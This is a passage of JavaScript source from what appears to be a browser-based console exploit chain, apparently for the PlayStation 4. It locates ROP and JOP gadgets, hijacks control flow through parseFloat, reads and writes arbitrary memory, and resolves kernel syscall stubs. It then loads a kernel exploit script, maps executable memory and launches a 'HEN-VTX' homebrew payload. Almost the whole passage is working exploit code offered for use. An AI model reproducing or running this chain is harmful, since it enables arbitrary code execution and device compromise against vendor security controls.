195 |     if (!gadgets_to_find && !slowpath_jop) {
196 |       setTimeout(donecb, 50);
197 |     } else {
198 |       print("missing gadgets: ");
199 |       for (var nl in gadgetnames) {
200 |         print(" - " + gadgetnames[nl]);
201 |       }
202 |       if (slowpath_jop) print(" - jop gadget");
203 |     }
204 |   }
205 | 
206 |   findgadget(function () { });
207 |   var hold1;
208 |   var hold2;
209 |   var holdz;
210 |   var holdz1;
211 | 
212 |   while (1) {
213 |     hold1 = { a: 0, b: 0, c: 0, d: 0 };
214 |     hold2 = { a: 0, b: 0, c: 0, d: 0 };
215 |     holdz1 = p.leakval(hold2);
216 |     holdz = p.leakval(hold1);
217 |     if (holdz.low - 0x30 == holdz1.low) break;
218 |   }
219 | 
220 |   var pushframe = [];
221 |   pushframe.length = 0x80;
222 |   var funcbuf;
223 |   var funcbuf32 = new Uint32Array(0x100);
224 |   nogc.push(funcbuf32);
225 | 
226 |   var launch_chain = function (chain) {
227 |     var stackPointer = 0;
228 |     var stackCookie = 0;
229 |     var orig_reenter_rip = 0;
230 | 
231 |     var reenter_help = {
232 |       length: {
233 |         valueOf: function () {
234 |           orig_reenter_rip = p.read8(stackPointer);
235 |           stackCookie = p.read8(stackPointer.add32(8));
236 |           var returnToFrame = stackPointer;
237 | 
238 |           var ocnt = chain.count;
239 |           chain.push_write8(stackPointer, orig_reenter_rip);
240 |           chain.push_write8(stackPointer.add32(8), stackCookie);
241 | 
242 |           if (chain.runtime) returnToFrame = chain.runtime(stackPointer);
243 | 
244 |           chain.push(gadgets["pop rsp"]);
245 |           chain.push(returnToFrame); // -> back to the trap life
246 |           chain.count = ocnt;
247 | 
248 |           p.write8(stackPointer, (gadgets["pop rsp"])); // pop pop
249 |           p.write8(stackPointer.add32(8), chain.stackBase); // rop rop
250 |         }
251 |       }
252 |     };
253 |     
254 |     funcbuf = p.read8(p.leakval(funcbuf32).add32(0x10));
255 | 
256 |     p.write8(funcbuf.add32(0x30), gadgets["setjmp"]);
257 |     p.write8(funcbuf.add32(0x80), gadgets["jop"]);
258 |     p.write8(funcbuf, funcbuf);
259 |     p.write8(parseFloatStore, gadgets["jop"]);
260 |     var orig_hold = p.read8(holdz1);
261 |     var orig_hold48 = p.read8(holdz1.add32(0x48));
262 | 
263 |     p.write8(holdz1, funcbuf.add32(0x50));
264 |     p.write8(holdz1.add32(0x48), funcbuf);
265 |     parseFloat(hold2, hold2, hold2, hold2, hold2, hold2);
266 |     p.write8(holdz1, orig_hold);
267 |     p.write8(holdz1.add32(0x48), orig_hold48);
268 | 
269 |     stackPointer = p.read8(funcbuf.add32(0x10));
270 |     rtv = Array.prototype.splice.apply(reenter_help);
271 |     return p.leakval(rtv);
272 |   }
273 | 
274 |   gadgets = gadgets;
275 |   p.loadchain = launch_chain;
276 | 
277 |   function swapkeyval(json) {
278 |     var ret = {};
279 |     for (var key in json) {
280 |       if (json.hasOwnProperty(key)) {
281 |         ret[json[key]] = key;
282 |       }
283 |     }
284 |     return ret;
285 |   }
286 | 
287 |   var kview = new Uint8Array(0x1000);
288 |   var kstr = p.leakval(kview).add32(0x10);
289 |   var orig_kview_buf = p.read8(kstr);
290 | 
291 |   p.write8(kstr, window.libKernelBase);
292 |   p.write4(kstr.add32(8), 0x40000);
293 | 
294 |   var countbytes;
295 |   for (var i = 0; i < 0x40000; i++) {
296 |     if (kview[i] == 0x72 && kview[i + 1] == 0x64 && kview[i + 2] == 0x6c && kview[i + 3] == 0x6f && kview[i + 4] == 0x63) {
297 |       countbytes = i;
298 |       break;
299 |     }
300 |   }
301 |   p.write4(kstr.add32(8), countbytes + 32);
302 | 
303 |   var dview32 = new Uint32Array(1);
304 |   var dview8 = new Uint8Array(dview32.buffer);
305 |   for (var i = 0; i < countbytes; i++) {
306 |     if (kview[i] == 0x48 && kview[i + 1] == 0xc7 && kview[i + 2] == 0xc0 && kview[i + 7] == 0x49 && kview[i + 8] == 0x89 && kview[i + 9] == 0xca && kview[i + 10] == 0x0f && kview[i + 11] == 0x05) {
307 |       dview8[0] = kview[i + 3];
308 |       dview8[1] = kview[i + 4];
309 |       dview8[2] = kview[i + 5];
310 |       dview8[3] = kview[i + 6];
311 |       var syscallno = dview32[0];
312 |       window.syscalls[syscallno] = window.libKernelBase.add32(i);
313 |     }
314 |   }
315 | 
316 |   var chain = new window.rop;
317 |   var returnvalue;
318 | 
319 |   p.fcall_ = function (rip, rdi, rsi, rdx, rcx, r8, r9) {
320 |     chain.clear();
321 | 
322 |     chain.notimes = this.next_notime;
323 |     this.next_notime = 1;
324 | 
325 |     chain.fcall(rip, rdi, rsi, rdx, rcx, r8, r9);
326 | 
327 |     chain.push(window.gadgets["pop rdi"]);
328 |     chain.push(chain.stackBase.add32(0x3ff8));
329 |     chain.push(window.gadgets["mov [rdi], rax"]);
330 | 
331 |     chain.push(window.gadgets["pop rax"]);
332 |     chain.push(p.leakval(0x41414242));
333 | 
334 |     if (chain.run().low != 0x41414242) throw new Error("unexpected rop behaviour");
335 |     returnvalue = p.read8(chain.stackBase.add32(0x3ff8));
336 |   }
337 | 
338 |   p.fcall = function () {
339 |     var rv = p.fcall_.apply(this, arguments);
340 |     return returnvalue;
341 |   }
342 | 
343 |   p.readstr = function (addr) {
344 |     var addr_ = addr.add32(0);
345 |     var rd = p.read4(addr_);
346 |     var buf = "";
347 |     while (rd & 0xFF) {
348 |       buf += String.fromCharCode(rd & 0xFF);
349 |       addr_.add32inplace(1);
350 |       rd = p.read4(addr_);
351 |     }
352 |     return buf;
353 |   }
354 | 
355 |   p.syscall = function (sysc, rdi, rsi, rdx, rcx, r8, r9) {
356 |     if (typeof sysc == "string") {
357 |       sysc = window.syscallnames[sysc];
358 |     }
359 |     if (typeof sysc != "number") {
360 |       throw new Error("invalid syscall");
361 |     }
362 | 
363 |     var off = window.syscalls[sysc];
364 |     if (off == undefined) {
365 |       throw new Error("invalid syscall");
366 |     }
367 | 
368 |     return p.fcall(off, rdi, rsi, rdx, rcx, r8, r9);
369 |   }
370 | 
371 |   p.stringify = function (str) {
372 |     var bufView = new Uint8Array(str.length + 1);
373 |     for (var i = 0; i < str.length; i++) {
374 |       bufView[i] = str.charCodeAt(i) & 0xFF;
375 |     }
376 |     window.nogc.push(bufView);
377 |     return p.read8(p.leakval(bufView).add32(0x10));
378 |   };
379 | 
380 |   p.malloc = function malloc(sz) {
381 |     var backing = new Uint8Array(0x10000 + sz);
382 |     window.nogc.push(backing);
383 |     var ptr = p.read8(p.leakval(backing).add32(0x10));
384 |     ptr.backing = backing;
385 |     return ptr;
386 |   }
387 | 
388 |   p.malloc32 = function malloc32(sz) {
389 |     var backing = new Uint8Array(0x10000 + sz * 4);
390 |     window.nogc.push(backing);
391 |     var ptr = p.read8(p.leakval(backing).add32(0x10));
392 |     ptr.backing = new Uint32Array(backing.buffer);
393 |     return ptr;
394 |   }
395 | 
396 |   // Test if the kernel is already patched
397 |   var test = p.syscall("sys_setuid", 0);
398 | 
399 |   if (test != '0') {
400 |     // Kernel not patched, run kernel exploit
401 |     sc = document.createElement("script");
402 |     sc.src = "kernel.js";
403 |     document.body.appendChild(sc);
404 |   } else {
405 |     var testMira = p.syscall("sys_setlogin", p.stringify("root"))
406 |     if(testMira != '0')
407 |     {
408 |       location.reload();
409 |     }
410 |     else
411 |     {
412 |       // All done all done!
413 |       showtime();
414 |     }
415 |   }
416 | }
417 | 
418 | window.setRTC = function(year, month, day, hours, minutes, seconds)
419 | {
420 |   var code_addr = new int64(0x26100000, 0x00000009);
421 |   var buffer = p.syscall("sys_mmap", code_addr, 0x300000, 7, 0x41000, -1, 0);
422 | 
423 |   // Load HEN-VTX
424 |   if (buffer == '926100000') {
425 |     var date1 = new Date(2012, 01, 01, 0, 0, 0);
426 |     var date2 = new Date(year, month, day, hours, minutes, seconds);// <-- these need to be made user selectable
427 |     var timetoset = (date2.getTime() - date1. getTime())/1000;
428 |     writeHomebrewEN(p, code_addr.add32(0x100000), timetoset);
429 |     alert(timetoset);
430 |   }
431 | 
432 |   // Launch HEN-VTX
433 |   p.fcall(code_addr);
434 |   alert("Success");
435 | }
436 | 


--------------------------------------------------------------------------------